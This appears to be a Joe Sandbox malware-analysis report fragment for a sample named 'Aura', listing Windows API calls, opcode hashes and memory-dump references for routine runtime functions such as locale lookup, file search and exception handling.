                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __floor_pentium4
                                                                                                                                                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                    • Opcode ID: 82f7a209115165d5d645a588057b10ca7e6f4e1ee6852967bc2f3ee16db1e686
                                                                                                                                                                                                                                                    • Instruction ID: 2959923258af2f8f8786ca87b6e8e72d3f5ac78af40884acf805ab665bb721e9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 82f7a209115165d5d645a588057b10ca7e6f4e1ee6852967bc2f3ee16db1e686
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74D21672E086298BDB65CF28CD44BEEB7F5EB44305F1441EAD40DA7240EB78AE858F45
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,000C13BD,00000002,00000000,?,?,?,000C13BD,?,00000000), ref: 000C1AA0
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,000C13BD,00000002,00000000,?,?,?,000C13BD,?,00000000), ref: 000C1AC9
                                                                                                                                                                                                                                                    • GetACP.KERNEL32(?,?,000C13BD,?,00000000), ref: 000C1ADE
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                    • Opcode ID: 44480b048ff8173efdc9466ef31d6e3659c5c5b0a5dd4ef83a7aef351cbcdea3
                                                                                                                                                                                                                                                    • Instruction ID: c443a44740d2f7e57ebe9216f0cfb535656bd4d06e068a57a1795c44f523445c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44480b048ff8173efdc9466ef31d6e3659c5c5b0a5dd4ef83a7aef351cbcdea3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85216232A06100AAE774CB54C900FDF73EAEF56B54B56846DE90AD7216E732DD40C752
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                                                                                                                                                                    • Instruction ID: 03eddda0b4bb5e0c87c425c40f5d660c5c5031d488aa6ab431d8ae86b7d2b0ce
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C023971E012199BDF14CFA9C880AEEBBF5FF49314F248269E519E7341D731AA45CB90
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 000C20D9
                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 000C21CD
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 000C220C
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 000C223F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1164774033-0
                                                                                                                                                                                                                                                    • Opcode ID: eb581e71afae62e7545fb1e1366232cb1fe2b0defec161245fbc7e9f60678aff
                                                                                                                                                                                                                                                    • Instruction ID: caa65ab1f99ba0587876ecd6342e553815c4aec4c0d46d79d8f94f026c84952c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb581e71afae62e7545fb1e1366232cb1fe2b0defec161245fbc7e9f60678aff
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C71E2B1905158AFDF71AF288C89FFEB7B9AB05300F1441EEE558A3212DB358E858F10
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 000AF8F5
                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 000AF9C1
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000AF9DA
                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 000AF9E4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                                                                                                                                    • Opcode ID: c2622ce1d0a21ab61ee2d4bde1f5df48fc08367573dd93352a05aeb4800c9336
                                                                                                                                                                                                                                                    • Instruction ID: 966f81ca87a5cc2307b2e5b4eef77f5aaacc747b7d7fe136791d1e5486848775
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2622ce1d0a21ab61ee2d4bde1f5df48fc08367573dd93352a05aeb4800c9336
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E31F775D02219DBDF21DFA4D9497CDBBB8AF08300F1041EAE40CAB250EB759A848F85
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000BC16A: GetLastError.KERNEL32(?,?,000B5495,000D8E38,0000000C), ref: 000BC16E
                                                                                                                                                                                                                                                      • Part of subcall function 000BC16A: SetLastError.KERNEL32(00000000), ref: 000BC210
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 000C15D4
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 000C161E
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 000C16E4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 661929714-0
                                                                                                                                                                                                                                                    • Opcode ID: 13af3edd389640a10f6fccec86352ebdb3b3ad3afb8aebaf7236e8f589923118
                                                                                                                                                                                                                                                    • Instruction ID: e13bbd1933de0327d179345d85aac32ecf9d26a44524368ab941d8ae5eb91196
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13af3edd389640a10f6fccec86352ebdb3b3ad3afb8aebaf7236e8f589923118
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1616E715141079BEB689F24CD82FFE77E8EF06700F14427AE905C6186EB34D951DB50
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 000B7F28
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 000B7F32
                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 000B7F3F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                                                                                                    • Opcode ID: d1edd6eea0b96700bd3581ad1dbd99fdcd5ca731cf9bb0893e7e9c481be217ba
                                                                                                                                                                                                                                                    • Instruction ID: 77e10590e63104766131d7940bff344f80e9e8b1a7f05a5f4b48320e81029852
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1edd6eea0b96700bd3581ad1dbd99fdcd5ca731cf9bb0893e7e9c481be217ba
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A31D274901229ABCB61DF64DC887DDBBB8BF18310F5041EAE80CA7291EB349F858F45
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetSystemTimePreciseAsFileTime.KERNEL32 ref: 000B00EC
                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,F7EDDA51,000A8E30,?,000CBE77,000000FF,?,000AFDB4,?,00000000,00000000,?,000AFDD8,?,000A8E30,?), ref: 000B00F0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Time$FileSystem$Precise
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 743729956-0
                                                                                                                                                                                                                                                    • Opcode ID: 9531d8f34378765e017b170cf5793d8cab7595f939d559f7e953d597c11d65a6
                                                                                                                                                                                                                                                    • Instruction ID: 00ca42bd92f9c26b9312498e1b316a211ee5ddcf269e3dcaf30ea4bbec2c909b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9531d8f34378765e017b170cf5793d8cab7595f939d559f7e953d597c11d65a6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1F06536A49654EFD7119F44DC01F9EB7A8FB08B10F05012BEC1297790DB39A900DB90
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,000C5BB9,?,?,00000008,?,?,000CBCAB,00000000), ref: 000C5E8B
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3997070919-0
                                                                                                                                                                                                                                                    • Opcode ID: d31db18d0993bba953b30fd29987a9647ec30ac99b6f295ae1bd842857b1b554
                                                                                                                                                                                                                                                    • Instruction ID: 0ad92a350295029fb3c8e02c20f87280691c3df701c9a694ac9a99b1550f3300
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d31db18d0993bba953b30fd29987a9647ec30ac99b6f295ae1bd842857b1b554
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6B15F35110A089FD769CF28C88AF597BE0FF45365F25865CE89ACF2A1C735E982CB40
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 000AF56B
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2325560087-0
                                                                                                                                                                                                                                                    • Opcode ID: 3bdf81b261d83519d242084b37da79df048b1a60d023c19ed229aeecc3303e23
                                                                                                                                                                                                                                                    • Instruction ID: 0a9c80988215dd30fd73d7f8de5414f26d671764eb3e3f86b2cc6e775f9a0818
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3bdf81b261d83519d242084b37da79df048b1a60d023c19ed229aeecc3303e23
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7BA17FB2902606CBEB18DF98D8817ADBBF5FB49354F25812BD811E73A0D7789944CF60
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000BC16A: GetLastError.KERNEL32(?,?,000B5495,000D8E38,0000000C), ref: 000BC16E
                                                                                                                                                                                                                                                      • Part of subcall function 000BC16A: SetLastError.KERNEL32(00000000), ref: 000BC210
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 000C1894
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3736152602-0
                                                                                                                                                                                                                                                    • Opcode ID: df96e3394c0a1e838e7acc8b50c776929a27e10a93d8f99e72ac9d00a968fc8e
                                                                                                                                                                                                                                                    • Instruction ID: 1b4cd73b06fac2b165957cc478af559516ede94b35658325b5e76ca7b81d6950
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df96e3394c0a1e838e7acc8b50c776929a27e10a93d8f99e72ac9d00a968fc8e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A216072615206ABEB289B69DC41FFE77A8EF06711B10407EFD02D6183EB389D459A50
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                    • API String ID: 0-4108050209
                                                                                                                                                                                                                                                    • Opcode ID: 0f468f1c5766cea09323f37ec19c65536b5eb227b7954c16e389a08d4ffbd507
                                                                                                                                                                                                                                                    • Instruction ID: a1db1ced38e23c0580eda7370f86f8a00fe1ba88dca22276b0e6fbb9097f5f08
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f468f1c5766cea09323f37ec19c65536b5eb227b7954c16e389a08d4ffbd507
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1B1AD3090060A8BCB78DF68C995AFEBBF1AF55300F544A1EE69297683C771AF41CB51
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000BC16A: GetLastError.KERNEL32(?,?,000B5495,000D8E38,0000000C), ref: 000BC16E
                                                                                                                                                                                                                                                      • Part of subcall function 000BC16A: SetLastError.KERNEL32(00000000), ref: 000BC210
                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(000C1580,00000001,00000000,?,-00000050,?,000C1363,00000000,-00000002,00000000,?,00000055,?), ref: 000C154A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2417226690-0
